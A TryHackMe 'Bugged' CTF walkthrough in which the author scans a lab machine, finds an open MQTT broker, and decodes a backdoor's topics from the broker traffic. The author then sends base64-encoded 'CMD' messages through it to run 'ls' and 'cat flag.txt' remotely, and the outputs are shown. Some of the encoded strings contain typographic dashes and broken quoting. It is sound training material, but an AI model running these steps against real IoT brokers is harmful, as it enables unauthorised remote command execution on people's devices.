Bugged Tryhackme CTF Writeup
John was working on his smart home appliances when he noticed weird traffic going across the network. Can you help him figure out what these weird network communications are?
Difficulty = Easy
Challenges: Network Analyze, IoT Hacking.
Beginning start with Rustscan. For scan, we use ‘-a’ flag to specify our target. And we also use ‘-r’ flag to set port ranges.
sak@kali~ rustscan -a 10.10.232.80 -r 1-5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍
[~] The config file is expected to be at "/home/sak/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 1073741716'.
Open 10.10.232.80:1883
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-05 12:52 +06
Initiating Ping Scan at 12:52
Scanning 10.10.232.80 [2 ports]
Completed Ping Scan at 12:52, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:52
Completed Parallel DNS resolution of 1 host. at 12:52, 0.30s elapsed
DNS resolution of 1 IPs took 0.30s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 12:52
Scanning 10.10.232.80 [1 port]
Discovered open port 1883/tcp on 10.10.232.80
Completed Connect Scan at 12:52, 0.25s elapsed (1 total ports)
Nmap scan report for 10.10.232.80
Host is up, received conn-refused (0.25s latency).
Scanned at 2023-03-05 12:52:49 +06 for 1s
PORT STATE SERVICE REASON
1883/tcp open mqtt syn-ack
It looks like there is 1 a service running. In target machine service ‘MQTT’ is running on TCP port ‘1883’.
Basic Information About ‘MQTT’
MQTT stands for MQ Telemetry Transport. It is a publish/subscribe, extremely simple, and lightweight messaging protocol, designed for constrained devices and low-bandwidth, high-latency, or unreliable networks. The design principles are to minimize network bandwidth and device resource requirements whilst also attempting to ensure reliability and some degree of assurance of delivery. These principles also turn out to make the protocol ideal for the emerging “machine-to-machine” (M2M) or “Internet of Things” world of connected devices, and for mobile applications where bandwidth and battery power are at a premium.
Default port: 1883
Now our second step began here. At this moment we start the Nmap scan to know more about the service that is running on the server.
For Nmap scan, we use ‘-sV’ flag to know about services & versions. And we use ‘-sC’ flag to default script scan. We also use ‘-p’ flag to specify which port we want to scan.
sak@kali~ sudo nmap -sV -sC -p 1883 10.10.232.80
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-05 13:08 +06
Nmap scan report for 10.10.232.80
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
1883/tcp open mosquitto version 2.0.14
| mqtt-subscribe:
| Topics and their most recent payloads:
| $SYS/broker/load/bytes/received/1min: 4410.65
| $SYS/broker/load/publish/sent/5min: 4.71
| $SYS/broker/load/messages/sent/15min: 85.18
| $SYS/broker/clients/connected: 2
| $SYS/broker/load/connections/5min: 0.39
| livingroom/speaker: {"id":15127941740320722645,"gain":46}
| $SYS/broker/messages/sent: 3575
| $SYS/broker/load/sockets/15min: 0.22
| $SYS/broker/store/messages/count: 34
| $SYS/broker/messages/stored: 34
| $SYS/broker/publish/messages/sent: 52
| $SYS/broker/clients/active: 2
| $SYS/broker/subscriptions/count: 3
| $SYS/broker/store/messages/bytes: 369
| $SYS/broker/publish/bytes/received: 119484
| storage/thermostat: {"id":14536458125521088285,"temperature":23.189959}
| patio/lights: {"id":8415478818146317759,"color":"WHITE","status":"OFF"}
| kitchen/toaster: {"id":9223877754878364611,"in_use":true,"temperature":156.5998,"toast_time":210}
| $SYS/broker/version: mosquitto version 2.0.14
| $SYS/broker/bytes/received: 167321
| frontdeck/camera: {"id":5624806846270235642,"yaxis":143.5409,"xaxis":-37.70204,"zoom":4.5788803,"movement":false}
| $SYS/broker/clients/maximum: 2
| $SYS/broker/messages/received: 3524
| $SYS/broker/load/bytes/received/15min: 3970.90
| $SYS/broker/retained messages/count: 36
| $SYS/broker/load/bytes/received/5min: 4291.50
| $SYS/broker/publish/bytes/sent: 291
| $SYS/broker/load/publish/sent/1min: 21.93
| $SYS/broker/load/sockets/1min: 1.83
| $SYS/broker/load/connections/15min: 0.14
| $SYS/broker/load/connections/1min: 1.83
| $SYS/broker/uptime: 2343 seconds
| $SYS/broker/load/sockets/5min: 0.42
| $SYS/broker/load/messages/sent/5min: 95.12
| $SYS/broker/load/messages/sent/1min: 113.75
| $SYS/broker/load/messages/received/5min: 90.41
| $SYS/broker/load/messages/received/1min: 91.82
| $SYS/broker/load/publish/sent/15min: 1.59
| $SYS/broker/load/messages/received/15min: 83.59
| $SYS/broker/load/bytes/sent/5min: 552.51
| $SYS/broker/load/bytes/sent/15min: 398.79
| $SYS/broker/load/bytes/sent/1min: 1255.39
| $SYS/broker/clients/total: 2
|_ $SYS/broker/bytes/sent: 16314
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.10 seconds
For ferther scan we use ‘mosquitto’ tool. If your device does have not this tool you can install it by this simple command.
sudo apt-get install mosquitto mosquitto-clients -y
Now we use “mosquitto_sub” and use ‘-t’ flag to specifying the topic and also use ‘-h’ flag to specify the host address. If we give any topic in in ‘-t’ flag then we’ll get information about that topic. But here we want information about all topics. So, on ‘-t’ flag we use the wildcard “#” for this operation.
sak@kali~ mosquitto_sub -t "#" -h 10.10.232.80
{"id":6303134845423256684,"gain":45}
{"id":7062282878224178102,"color":"GREEN","status":"ON"}
{"id":5297822194260674402,"temperature":24.360235}
{"id":2860013371319219134,"temperature":24.233936}
{"id":5845551519049790310,"gain":61}
{"id":14786151255640681934,"color":"RED","status":"OFF"}
{"id":11637714936854629483,"in_use":false,"temperature":158.6413,"toast_time":207}
{"id":12972826565605654962,"temperature":23.58}
{"id":5464270745344776246,"yaxis":88.01166,"xaxis":-120.650795,"zoom":3.0464551,"movement":false}
{"id":3711207335622492878,"gain":55}
{"id":7536635942787451007,"color":"GREEN","status":"OFF"}
{"id":14890795244202004796,"temperature":23.076757}
{"id":2458810731003226774,"in_use":true,"temperature":144.60513,"toast_time":251}
{"id":9928724913760140067,"gain":73}
{"id":6498368860634934991,"temperature":24.349384}
{"id":3598942894745952976,"color":"RED","status":"ON"}
{"id":12888160293013420529,"yaxis":124.13611,"xaxis":175.50891,"zoom":0.9612895,"movement":true}
{"id":7852150045648343267,"in_use":false,"temperature":153.8073,"toast_time":121}
{"id":17285335294252743187,"gain":54}
{"id":11505589973457021977,"temperature":23.719482}
eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ==
{"id":16076301308523402932,"color":"RED","status":"ON"}
{"id":7411803660708968315,"gain":60}
{"id":18348470723758418035,"temperature":23.625862}
{"id":12464564460746554731,"in_use":true,"temperature":150.03351,"toast_time":297}
{"id":652803559971738546,"color":"GREEN","status":"ON"}
{"id":6540437519393488331,"temperature":23.25789}
{"id":5951090730247747994,"yaxis":76.82907,"xaxis":-96.71407,"zoom":1.7843343,"movement":false}
{"id":12233324324560130586,"gain":49}
In this operation we got something interesting thing:
“eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ==”
They asked us, “Can you help him figure out what these weird network communications are?” Yes, got something weird on network communications.
This is base64 encoded. So, let’s decode this and see what we got.
sak@kali ~ echo "eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ==" | base64 -d
{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","registered_commands":["HELP","CMD","SYS"],"pub_topic":"U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub","sub_topic":"XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub"}%
After decoding there is registered_command and publiser_topic also subscriber_topic.
In this MQTT model publisher always publish data and the subscriber always receives data but the subscriber can’t tell the publisher or IoT device what to do or what to publish (cause it is precoded). So, there might be a security vulnerability. We have to find out :)
In decoded section, this publisher topic “U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub” is registered with the commands “HELP”,”CMD”,”SYS”. Let’s check What can do with this stuff.
Now we try to receive data from the publisher. So, We have to start our subscribers. For that use this command.
sak@kali ~ mosquitto_sub -t "U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub" -h 10.10.20.204
Now we going to simulate the IoT device. For that, we use subscriber id “XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub‘ and send a message to the subscriber.
mosquitto_pub -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "simple_massage" -h 10.10.20.204
In here ‘-m’ flag for our massage. Let’s check what subscribers got.
sak@kali ~ mosquitto_sub -t "U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub" -h 10.10.20.204
SW52YWxpZCBtZXNzYWdlIGZvcm1hdC4KRm9ybWF0OiBiYXNlNjQoeyJpZCI6ICI8YmFja2Rvb3IgaWQ+IiwgImNtZCI6ICI8Y29tbWFuZD4iLCAiYXJnIjogIjxhcmd1bWVudD4ifSk=
Another base64 encoded string. Now we are going to decode the base64 string.
sak@kali ~ echo "SW52YWxpZCBtZXNzYWdlIGZvcm1hdC4KRm9ybWF0OiBiYXNlNjQoeyJpZCI6ICI8YmFja2Rvb3IgaWQ+IiwgImNtZCI6ICI8Y29tbWFuZD4iLCAiYXJnIjogIjxhcmd1bWVudD4ifSk=" | base64 -d
Invalid message format.
Format: base64({"id": "<backdoor id>", "cmd": "<command>", "arg": "<argument>"})%
Interesting! we got a massage format and the communication is base64 decoded. Here MQTT was expecting a base64 decoded massage and also want ‘id’, ‘cmd’, and ‘arg’. So, let’s make things right.
Beginning we got ‘id’ = “cdd1b1c0–1c40–4b0f-8e22–61b357548b7d” and it’s accepting cmd “‘HELP’, ‘CMD’, ‘SYS’”. We are going to use “CMD’ and as ‘arg’ we are going to use “ls”.
The massage will be:
{"id": "cdd1b1c0–1c40–4b0f-8e22–61b357548b7d", "cmd": "CMD", "arg": "ls"}
Now we need to encode it on base:
“e2lkOiAiY2RkMWIxYzDigJMxYzQw4oCTNGIwZi04ZTIy4oCTNjFiMzU3NTQ4YjdkIiwgY21kOiAiQ01EIiwgYXJnOiAibHMifQ==”
Now we send this base64 string as a massage. Our command will be:
sak@kali ~ mosquitto_pub -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "e2lkOiAiY2RkMWIxYzDigJMxYzQw4oCTNGIwZi04ZTIy4oCTNjFiMzU3NTQ4YjdkIiwgY21kOiAiQ01EIiwgYXJnOiAibHMifQ==" -h 10.10.20.204
We received something encoded in base64.
sak@kali ~ mosquitto_sub -t "U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub" -h 10.10.20.204
eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlc3BvbnNlIjoiZmxhZy50eHRcbij9
After Decode the base64 string finds a text file called “flag .txt”
sak@kali ~ echo "eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlc3BvbnNlIjoiZmxhZy50eHRcbij9" | base64 -d
{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","response":"flag.txt\n}
So, Let’s grab our flag. For that, we have to change the argument. And it will be ‘arg’ “cat flag.txt”
{"id": "cdd1b1c0–1c40–4b0f-8e22–61b357548b7d", "cmd": "CMD", "arg": "cat flag.txt"}
sak@kali ~ echo "{"id": "cdd1b1c0–1c40–4b0f-8e22–61b357548b7d", "cmd": "CMD", "arg": "cat flag.txt"}" | base64
e2lkOiBjZGQxYjFjMOKAkzFjNDDigJM0YjBmLThlMjLigJM2MWIzNTc1NDhiN2QsIGNtZDogQ01E
LCBhcmc6IGNhdCBmbGFnLnR4dH0K
We have to decode it in base64 then we send another massage.
sak@kali ~ mosquitto_pub -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "e2lkOiBjZGQxYjFjMOKAkzFjNDDigJM0YjBmLThlMjLigJM2MWIzNTc1NDhiN2QsIGNtZDogQ01E
LCBhcmc6IGNhdCBmbGFnLnR4dH0K" -h 10.10.20.204
In our subscriber part, we receive another base64 massage.
sak@kali ~ mosquitto_sub -t "U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub" -h 10.10.20.204
eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlc3BvbnNlIjoiZmxhZ3suLi4uLi4uLi4ufSJ9
Hopefully, after decoding this string we’ll get our flag! Let’s see….
sak@kali ~/ctf/thm echo "eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlc3BvbnNlIjoiZmxhZ3suLi4uLi4uLi4ufSJ9" | base64 -d
{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","response":"flag{..........}
Bingoo!!! we got our CTF flag…….
Note: In here I changed the base64 code to not reveal the flag. Cause I really want you to do all the stuff on your own. Why not? IoT hacking isa pleaser.
Happy Hacking!!!!! See you next time in another post :)
Thanks for Reading!!
Follow me on Twitter: https://twitter.com/sakibulalikhan
Happy Bugged~
Comments